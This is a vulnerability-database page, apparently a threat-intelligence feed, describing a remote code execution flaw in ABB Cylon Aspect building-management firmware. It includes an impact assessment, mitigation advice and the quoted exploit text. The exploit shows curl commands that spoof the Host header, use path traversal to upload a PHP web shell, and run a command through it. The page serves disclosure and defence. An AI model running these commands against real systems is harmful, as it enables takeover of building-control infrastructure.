ABB Cylon Aspect 3.08.04 DeploySource - Remote Code Execution (RCE)
ABB Cylon Aspect 3.08.04 DeploySource - Remote Code Execution (RCE)
AI Analysis
Technical Summary
The ABB Cylon Aspect 3.08.04 DeploySource vulnerability is a critical remote code execution (RCE) flaw affecting ABB's building management system (BMS) and building automation system (BAS) products, including the NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, and ASPECT-Studio firmware versions up to 3.08.04. The vulnerability resides in the AuthenticatedHttpServlet component of the application server, which improperly validates the Host HTTP header. By setting the Host header to 127.0.0.1, an attacker can bypass authentication mechanisms, causing the server to treat the request as originating from localhost. This unauthorized access allows attackers to reach privileged servlets such as the DeploymentServlet, which suffers from a directory traversal vulnerability. Exploiting this, attackers can write arbitrary PHP files outside the intended directory scope, effectively uploading a malicious web shell. Once deployed, this shell enables execution of system commands with the privileges of the web server user, typically 'apache', potentially leading to full system compromise. The exploit has been tested on multiple Linux kernel versions (2.6.32 to 3.15.10) and hardware architectures (x86_64 and ARMv7l), with various PHP versions from 4.4.8 to 7.3.11, and web servers including lighttpd and Apache 2.2.15 on CentOS. The vulnerability leverages a combination of authentication bypass and directory traversal to achieve remote code execution without requiring valid credentials or user interaction. The exploit code demonstrates how to upload a PHP shell via crafted HTTP requests with the Host header set to 127.0.0.1 and then execute arbitrary commands remotely. This vulnerability was discovered by Gjoko 'LiquidWorm' Krstic and publicly disclosed in April 2024 with advisory ZSL-2025-5954. No official patches or vendor mitigations are currently linked, and no known exploits in the wild have been reported yet. However, the critical nature of the flaw and the ease of exploitation make it a significant threat to organizations using affected ABB Cylon Aspect products.
Potential Impact
For European organizations, the impact of this vulnerability is substantial, especially for those relying on ABB Cylon Aspect BMS/BAS solutions to manage critical building infrastructure such as energy management, HVAC, and security systems. Successful exploitation can lead to full system compromise, allowing attackers to execute arbitrary commands, manipulate building controls, disrupt operations, or pivot to other internal networks. This could result in operational downtime, safety hazards, data breaches, and regulatory non-compliance, particularly under GDPR and critical infrastructure protection frameworks. Given ABB's significant market presence in Europe, including in sectors like manufacturing, commercial real estate, and public infrastructure, the risk of disruption and potential physical consequences is high. The vulnerability's ability to bypass authentication and execute code remotely without user interaction increases the likelihood of targeted attacks or automated exploitation attempts once exploit code becomes widely available.
Mitigation Recommendations
1. Immediate network segmentation: Isolate ABB Cylon Aspect devices from general enterprise networks and restrict access to management interfaces to trusted internal IPs only. 2. Implement strict ingress filtering and firewall rules to block external access to the vulnerable HTTP servlets, especially blocking requests with suspicious Host headers. 3. Monitor HTTP traffic for anomalous Host header values, particularly '127.0.0.1', and deploy intrusion detection/prevention systems (IDS/IPS) with custom signatures to detect exploitation attempts. 4. Disable or restrict the DeploymentServlet functionality if possible, or apply application-level access controls to prevent unauthorized use. 5. Conduct thorough audits of deployed ABB Cylon Aspect systems to identify affected firmware versions and isolate or upgrade devices. 6. Engage with ABB support channels to obtain patches or official mitigations as they become available. 7. Employ application whitelisting and endpoint protection on servers hosting the BMS/BAS to detect and block unauthorized PHP shells or suspicious file writes. 8. Regularly back up configuration and system states to enable rapid recovery in case of compromise. 9. Educate operational technology (OT) and IT security teams about this vulnerability to ensure rapid detection and response. 10. Consider deploying web application firewalls (WAF) with custom rules to block directory traversal and unauthorized deployment requests.
Affected Countries
Germany, France, United Kingdom, Italy, Netherlands, Sweden, Belgium, Spain, Poland, Switzerland
Indicators of Compromise
- exploit-code: ABB Cylon Aspect 3.08.04 DeploySource - Remote Code Execution (RCE) Vendor: ABB Ltd. Product web page: https://www.global.abb Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio Firmware: <=3.08.04 Summary: ASPECT is an award-winning scalable building energy management and control solution designed to allow users seamless access to their building data through standard building protocols including smart devices. Desc: ABB Cylon Aspect BMS/BAS is vulnerable to a critical flaw in the AuthenticatedHttpServlet within its application server, enabling remote attackers to bypass authentication by setting the Host: 127.0.0.1 header. This deceives the server into processing requests as if they originate from localhost, granting unauthorized access to privileged operations. This bypass grants access to privileged functionality, including the DeploymentServlet, which is vulnerable to directory traversal. By leveraging this, an attacker can write arbitrary PHP files outside the intended directory scope. When combined, these issues allow remote attackers to upload a malicious PHP shell and execute system commands with the privileges of the web server, leading to full system compromise. Tested on: GNU/Linux 3.15.10 (armv7l) GNU/Linux 3.10.0 (x86_64) GNU/Linux 2.6.32 (x86_64) Intel(R) Atom(TM) Processor E3930 @ 1.30GHz Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz PHP/7.3.11 PHP/5.6.30 PHP/5.4.16 PHP/4.4.8 PHP/5.3.3 AspectFT Automation Application Server lighttpd/1.4.32 lighttpd/1.4.18 Apache/2.2.15 (CentOS) OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64) OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode) ErgoTech MIX Deployment Server 2.0.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2025-5954 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5954.php 21.04.2024 -- $ cat project P R O J E C T .| | | |'| ._____ ___ | | |. |' .---"| _ .-' '-. | | .--'| || | _| | .-'| _.| | || '-__ | | | || | |' | |. | || | | | | || | ____| '-' ' "" '-' '-.' '` |____ ░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ $ curl "http://192.168.73.31:7226/servlets/DeploymentServlet\ > ?RequestType=DeploySource\ > &filename=../../../home/MIX_CMIX/htmlroot/zsl.php\ > &directory=/" \ > --data-binary @zsl.php \ > -H "Host: 127.0.0.1" \ > -H "Content-Type: application/octet-stream" <HTML><HEAD><TITLE>200 Successful</TITLE></HEAD><BODY>200 Successful</BODY></HTML> $ curl http://192.168.73.31/zsl.php?cmd=id;ls -al zsl.php uid=48(apache) gid=48(apache) groups=48(apache),0(root) context=system_u:system_r:httpd_t:s0 -rw-r--r--. 1 root root 106 Jun 4 13:29 zsl.php
ABB Cylon Aspect 3.08.04 DeploySource - Remote Code Execution (RCE)
Description
ABB Cylon Aspect 3.08.04 DeploySource - Remote Code Execution (RCE)
AI-Powered Analysis
Technical Analysis
The ABB Cylon Aspect 3.08.04 DeploySource vulnerability is a critical remote code execution (RCE) flaw affecting ABB's building management system (BMS) and building automation system (BAS) products, including the NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, and ASPECT-Studio firmware versions up to 3.08.04. The vulnerability resides in the AuthenticatedHttpServlet component of the application server, which improperly validates the Host HTTP header. By setting the Host header to 127.0.0.1, an attacker can bypass authentication mechanisms, causing the server to treat the request as originating from localhost. This unauthorized access allows attackers to reach privileged servlets such as the DeploymentServlet, which suffers from a directory traversal vulnerability. Exploiting this, attackers can write arbitrary PHP files outside the intended directory scope, effectively uploading a malicious web shell. Once deployed, this shell enables execution of system commands with the privileges of the web server user, typically 'apache', potentially leading to full system compromise. The exploit has been tested on multiple Linux kernel versions (2.6.32 to 3.15.10) and hardware architectures (x86_64 and ARMv7l), with various PHP versions from 4.4.8 to 7.3.11, and web servers including lighttpd and Apache 2.2.15 on CentOS. The vulnerability leverages a combination of authentication bypass and directory traversal to achieve remote code execution without requiring valid credentials or user interaction. The exploit code demonstrates how to upload a PHP shell via crafted HTTP requests with the Host header set to 127.0.0.1 and then execute arbitrary commands remotely. This vulnerability was discovered by Gjoko 'LiquidWorm' Krstic and publicly disclosed in April 2024 with advisory ZSL-2025-5954. No official patches or vendor mitigations are currently linked, and no known exploits in the wild have been reported yet. However, the critical nature of the flaw and the ease of exploitation make it a significant threat to organizations using affected ABB Cylon Aspect products.
Potential Impact
For European organizations, the impact of this vulnerability is substantial, especially for those relying on ABB Cylon Aspect BMS/BAS solutions to manage critical building infrastructure such as energy management, HVAC, and security systems. Successful exploitation can lead to full system compromise, allowing attackers to execute arbitrary commands, manipulate building controls, disrupt operations, or pivot to other internal networks. This could result in operational downtime, safety hazards, data breaches, and regulatory non-compliance, particularly under GDPR and critical infrastructure protection frameworks. Given ABB's significant market presence in Europe, including in sectors like manufacturing, commercial real estate, and public infrastructure, the risk of disruption and potential physical consequences is high. The vulnerability's ability to bypass authentication and execute code remotely without user interaction increases the likelihood of targeted attacks or automated exploitation attempts once exploit code becomes widely available.
Mitigation Recommendations
1. Immediate network segmentation: Isolate ABB Cylon Aspect devices from general enterprise networks and restrict access to management interfaces to trusted internal IPs only. 2. Implement strict ingress filtering and firewall rules to block external access to the vulnerable HTTP servlets, especially blocking requests with suspicious Host headers. 3. Monitor HTTP traffic for anomalous Host header values, particularly '127.0.0.1', and deploy intrusion detection/prevention systems (IDS/IPS) with custom signatures to detect exploitation attempts. 4. Disable or restrict the DeploymentServlet functionality if possible, or apply application-level access controls to prevent unauthorized use. 5. Conduct thorough audits of deployed ABB Cylon Aspect systems to identify affected firmware versions and isolate or upgrade devices. 6. Engage with ABB support channels to obtain patches or official mitigations as they become available. 7. Employ application whitelisting and endpoint protection on servers hosting the BMS/BAS to detect and block unauthorized PHP shells or suspicious file writes. 8. Regularly back up configuration and system states to enable rapid recovery in case of compromise. 9. Educate operational technology (OT) and IT security teams about this vulnerability to ensure rapid detection and response. 10. Consider deploying web application firewalls (WAF) with custom rules to block directory traversal and unauthorized deployment requests.
For access to advanced analysis and higher rate limits, contact root@offseq.com
Technical Details
- Edb Id
- 52317
- Has Exploit Code
- true
- Code Language
- text
Indicators of Compromise
Exploit Source Code
Exploit code for ABB Cylon Aspect 3.08.04 DeploySource - Remote Code Execution (RCE)
ABB Cylon Aspect 3.08.04 DeploySource - Remote Code Execution (RCE) Vendor: ABB Ltd. Product web page: https://www.global.abb Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio Firmware: <=3.08.04 Summary: ASPECT is an award-winning scalable building energy management and control solution designed to allow users seamless access to their building data through standard building protocols including smart devices. Desc: ABB Cylon Aspect BMS/BAS is
... (3576 more characters)
Threat ID: 68489c8b82cbcead926210e8
Added to database: 6/10/2025, 8:58:51 PM
Last enriched: 6/11/2025, 8:16:18 AM
Last updated: 8/12/2025, 1:02:56 PM
Views: 18
Related Threats
Taiwan Web Servers Breached by UAT-7237 Using Customized Open-Source Hacking Tools
HighHacked Law Enforcement and Government Email Accounts Sold on Dark Web
HighAugust News and Resources Catch Up (French)
CriticalU.S. CISA adds N-able N-Central flaws to its Known Exploited Vulnerabilities catalog - Security Affairs
MediumU.S. CISA adds Microsoft Internet Explorer, Microsoft Office Excel, and WinRAR flaws to its Known Exploited Vulnerabilities catalog
MediumActions
Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.
External Links
Need enhanced features?
Contact root@offseq.com for Pro access with improved analysis and higher rate limits.